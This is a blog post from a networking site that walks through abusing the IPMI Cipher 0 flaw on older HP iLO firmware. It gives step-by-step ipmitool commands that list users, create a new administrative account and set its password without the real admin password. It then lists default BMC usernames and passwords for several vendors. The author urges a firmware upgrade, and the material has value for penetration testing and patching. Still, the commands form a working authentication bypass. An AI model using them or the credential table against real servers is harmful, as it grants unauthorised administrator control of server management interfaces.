Hubbard on Networking: Create an HP iLo account when you don't know the Admin Password

Thursday, December 22, 2016

Create an HP iLo account when you don't know the Admin Password

Older versions of Out of band management processors like HP iLo, Dell DRAC, IBM IMM and Supermicro IPMI supported a feature called Cipher 0 which is clear-text authentication. But due to a flaw in the implementation ANY password works against the built in Administrator account.

Ubuntu has a package called ipmitool in it's repository. Using ipmitool you can list the users and add a new Administrative user. For HP iLo this works on firmware up to v1.6 on iLo3 and up to v1.3 on iLo4.

To install ipmitool
sudo apt-get install ipmitool

Once the install is complete you can use the list command to see the current users:

ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list

Once you run the list command look for an ID that shows ( Empty User).

On the server I used this command on ID2 was empty so I ran:

ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set name 2 Monitor

to create a new user.

and finally

ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set password 2 SecretPassword

to create a password.

Once that was done I opened a browser and logged into iLo as an administrator using my newly created account.

Obviously this is a security issue! You must upgrade your firmware to fix this issue.

All manufactures except HP use a default password so you don't even have to create a user if IT didn't change the default.

Product Name	Default Username	Default Password
HP Integrated Lights Out (iLO)	Administrator	<factory randomized 8-character string>
Dell Remote Access Card (iDRAC, DRAC)	root	calvin
IBM Integrated Management Module (IMM)	USERID	PASSW0RD (with a zero)
Fujitsu Integrated Remote Management Controller	admin	admin
Supermicro IPMI (2.0)	ADMIN	ADMIN
Oracle/Sun Integrated Lights Out Manager (ILOM)	root	changeme
ASUS iKVM BMC	admin	admin

The reference websites listed below have much more information on IPMI hacking. The link HPiLO Cmdlets is an article on using Powershell under Windows to manage iLo.

References

Hacking IPMI Cipher 0 Using Kali Linux - A nice tutorial on using ipmitool and bmc-config
A Penetration Tester's Guide to IPMI and BMCs - A great tutorial on the Cipher 0 issue and IPMI
How to find all the iLO’s on your network - A nice bash script for locating iLo devices on a subnet
HPiLO Cmdlets Version 1.2.0.0 - HP's download for iLo Powershell Cmdlets
HewlettPackard PowerShell Sample Scripts - Some official HP sample scripts
GNU FreeIPMI - A Linux package for working with BMCs
IPMITOOL useful examples
IPMI++ Security Best Practices

@rikosintie

Michael earned his first IT certification, a Novell Certified Netware Engineer (CNE) in 1993. Michael then focused on the Microsoft MCSE credential, studied database design, and wrote several Visual Basic programs to automate production at a manufacturing company. In 2000 he earned the Cisco CCNA. Since then, Michael has earned Cisco’s security certification, Aruba’s switching certification, and the LPI’s Linux Essentials certification.

Hubbard on Networking

Thursday, December 22, 2016

Create an HP iLo account when you don't know the Admin Password

References

No comments:

Post a Comment